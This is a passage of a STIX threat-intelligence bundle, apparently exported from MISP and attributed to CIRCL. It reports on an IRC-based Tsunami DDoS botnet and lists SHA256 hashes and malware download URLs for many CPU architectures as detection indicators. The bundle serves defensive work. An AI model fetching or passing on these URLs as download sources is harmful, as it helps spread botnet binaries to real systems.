2023-04-21 14:44:17 +00:00
|
|
|
{
|
|
|
|
|
"type": "bundle",
|
|
|
|
|
"id": "bundle--5cc410a0-be10-4990-acf6-44cc02de0b81",
|
|
|
|
|
"objects": [
|
|
|
|
|
{
|
|
|
|
|
"type": "identity",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T09:04:26.000Z",
|
|
|
|
|
"modified": "2019-04-27T09:04:26.000Z",
|
|
|
|
|
"name": "CIRCL",
|
|
|
|
|
"identity_class": "organization"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "report",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "report--5cc410a0-be10-4990-acf6-44cc02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T09:04:26.000Z",
|
|
|
|
|
"modified": "2019-04-27T09:04:26.000Z",
|
|
|
|
|
"name": "OSINT - Analysis of an IRC based Botnet",
|
|
|
|
|
"published": "2019-04-27T09:04:47Z",
|
|
|
|
|
"object_refs": [
|
|
|
|
|
"indicator--5cc410ae-1374-4513-b215-479e02de0b81",
|
|
|
|
|
"indicator--5cc4179d-5500-4efe-a798-492b02de0b81",
|
|
|
|
|
"indicator--5cc4179d-bff0-47d9-aadc-4c0e02de0b81",
|
|
|
|
|
"indicator--5cc4179d-c50c-43dd-905d-4e5f02de0b81",
|
|
|
|
|
"indicator--5cc4179d-d280-413b-9c00-492c02de0b81",
|
|
|
|
|
"indicator--5cc4179d-5b24-41a5-97b7-4c6802de0b81",
|
|
|
|
|
"indicator--5cc4179d-15ec-4cc3-a885-44c702de0b81",
|
|
|
|
|
"indicator--5cc4179d-f0bc-4279-a64b-478a02de0b81",
|
|
|
|
|
"indicator--5cc4179d-023c-4b02-ae81-43bf02de0b81",
|
|
|
|
|
"indicator--5cc4179d-9a80-4f29-af94-4ccd02de0b81",
|
|
|
|
|
"indicator--5cc4179d-ef0c-426c-9b7c-4e3802de0b81",
|
|
|
|
|
"indicator--5cc4179d-1d2c-4f08-861f-4a8802de0b81",
|
|
|
|
|
"indicator--5cc4179d-a5f4-4644-8938-448102de0b81",
|
|
|
|
|
"indicator--5cc4179d-ecc4-4beb-b4f1-4f8902de0b81",
|
|
|
|
|
"indicator--5cc4179d-4048-4450-913a-415a02de0b81",
|
|
|
|
|
"indicator--5cc41804-cc64-4ea0-ac90-41a702de0b81",
|
|
|
|
|
"indicator--5cc41804-b52c-4fc2-9cc7-4b2502de0b81",
|
|
|
|
|
"indicator--5cc41804-2b74-4df3-9d09-4d0d02de0b81",
|
|
|
|
|
"indicator--5cc41804-7878-4dcf-a69c-474802de0b81",
|
|
|
|
|
"indicator--5cc41804-7f90-42a3-8865-4b6e02de0b81",
|
|
|
|
|
"indicator--5cc41804-dbd0-464c-b6de-462202de0b81",
|
|
|
|
|
"indicator--5cc41804-235c-49fe-8303-4a8e02de0b81",
|
|
|
|
|
"indicator--5cc41804-58f0-4fff-810e-472d02de0b81",
|
|
|
|
|
"indicator--5cc41804-a4c8-4691-8b09-443902de0b81",
|
|
|
|
|
"indicator--5cc41804-31dc-4d16-b61e-4b6502de0b81",
|
|
|
|
|
"observed-data--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
|
|
|
|
|
"url--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
|
|
|
|
|
"indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
|
"x-misp-object--ec7ab03e-c8dd-4dd2-886e-cf39dada576c",
|
|
|
|
|
"indicator--5cc410e3-9a44-4c3a-abb2-498602de0b81",
|
|
|
|
|
"x-misp-object--5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81",
|
|
|
|
|
"malware--5cc417e0-af4c-4df0-974b-4cd102de0b81",
|
|
|
|
|
"indicator--6264284d-c9d5-4c12-8ba3-0f3c4ac9231a",
|
|
|
|
|
"x-misp-object--c584310f-cfa6-4ca0-b283-88853eff679e",
|
|
|
|
|
"indicator--a6383e65-36cc-4e3a-8d2e-439afdb5a58b",
|
|
|
|
|
"x-misp-object--dc71966f-e4cf-4026-a133-50090fd4b95b",
|
|
|
|
|
"indicator--7c1420e2-b2c6-455a-ae2d-675b32ffa908",
|
|
|
|
|
"x-misp-object--67696428-f0ea-4068-b00a-f669ee50ae03",
|
|
|
|
|
"indicator--45275180-143d-4606-9cd3-6bc35646d412",
|
|
|
|
|
"x-misp-object--5a3041a4-6ba6-4ce5-8d08-59693a3c3703",
|
|
|
|
|
"indicator--56c96c2d-6b60-480a-a6dd-392718a6b188",
|
|
|
|
|
"x-misp-object--b5470b5b-e9e6-4ed2-b7c3-108f1e42b227",
|
|
|
|
|
"indicator--548d726e-92df-4311-b2d7-ea098d9a2570",
|
|
|
|
|
"x-misp-object--d2a962b8-e9f1-4db3-a4ab-cc399560f5cd",
|
|
|
|
|
"indicator--06546ec0-783e-40a7-a681-d2d25f245cf8",
|
|
|
|
|
"x-misp-object--5473bd03-6e2e-435d-b979-cca55055af85",
|
|
|
|
|
"indicator--2f932e33-d889-4470-9aca-8ffd5769e055",
|
|
|
|
|
"x-misp-object--66a53076-8934-43d7-b983-ab73ddd29d99",
|
|
|
|
|
"indicator--952c0e2d-e595-4f12-a5d4-25ec983c91b6",
|
|
|
|
|
"x-misp-object--d4872fd8-7dc8-47d3-85e7-6e5aebe63db6",
|
|
|
|
|
"indicator--1823da6d-442b-46cf-806d-aac97de195a4",
|
|
|
|
|
"x-misp-object--b5d7ba31-66eb-4bc9-a2c8-5140d36761b8",
|
2024-04-05 12:15:17 +00:00
|
|
|
"relationship--a96edda1-d092-4dd0-af57-c4ec6e515813",
|
|
|
|
|
"relationship--344620c9-c971-4ce1-966a-5b9e488737e3",
|
|
|
|
|
"relationship--828352e8-cc6c-461b-aa18-b2d096986df2",
|
|
|
|
|
"relationship--14b0f5bb-f5e5-4de5-bac5-a58d90a9e163",
|
|
|
|
|
"relationship--78d3dd0d-6663-4d17-a7cb-3983707cab4e",
|
|
|
|
|
"relationship--5688cf5d-171b-401e-b6db-3ae4cd296575",
|
|
|
|
|
"relationship--4df963aa-df8f-441b-8691-746d3c84f53e",
|
|
|
|
|
"relationship--d1e4b811-8eb2-4771-a5e7-8bb521dccb9c",
|
|
|
|
|
"relationship--00a0e852-f869-48e3-982f-fe0563bba27f",
|
|
|
|
|
"relationship--428a5c1e-e690-4ab7-9299-f1c7cb62c846",
|
|
|
|
|
"relationship--c7e409d3-15cf-48af-9335-be17e90ba8f5",
|
|
|
|
|
"relationship--d495eb83-bb8d-4a9b-b147-6fee2b7f77b4",
|
|
|
|
|
"relationship--c1aa6872-94cb-4dea-86e5-9f6a72cbb392",
|
|
|
|
|
"relationship--6e29b60b-1642-49e4-a253-79a672c93ce6"
|
2023-04-21 14:44:17 +00:00
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"Threat-Report",
|
|
|
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
|
|
|
"type:OSINT",
|
|
|
|
|
"osint:lifetime=\"perpetual\"",
|
|
|
|
|
"osint:certainty=\"50\"",
|
|
|
|
|
"misp-galaxy:malpedia=\"Tsunami\"",
|
|
|
|
|
"ddos:type=\"flooding-attack\"",
|
|
|
|
|
"ecsirt:availability=\"ddos\""
|
|
|
|
|
],
|
|
|
|
|
"object_marking_refs": [
|
|
|
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc410ae-1374-4513-b215-479e02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:19:58.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:19:58.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:19:58Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-5500-4efe-a798-492b02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/mips']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-bff0-47d9-aadc-4c0e02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/mipsel']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-c50c-43dd-905d-4e5f02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/sh4']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-d280-413b-9c00-492c02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/x86']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-5b24-41a5-97b7-4c6802de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/armv7l']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-15ec-4cc3-a885-44c702de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/armv6l']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-f0bc-4279-a64b-478a02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/i686']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-023c-4b02-ae81-43bf02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/powerpc']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-9a80-4f29-af94-4ccd02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/i586']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-ef0c-426c-9b7c-4e3802de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/m68k']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-1d2c-4f08-861f-4a8802de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/sparc']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-a5f4-4644-8938-448102de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/armv4l']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-ecc4-4beb-b4f1-4f8902de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/armv5l']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc4179d-4048-4450-913a-415a02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/440fp']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-cc64-4ea0-ac90-41a702de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-b52c-4fc2-9cc7-4b2502de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-2b74-4df3-9d09-4d0d02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-7878-4dcf-a69c-474802de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-7f90-42a3-8865-4b6e02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
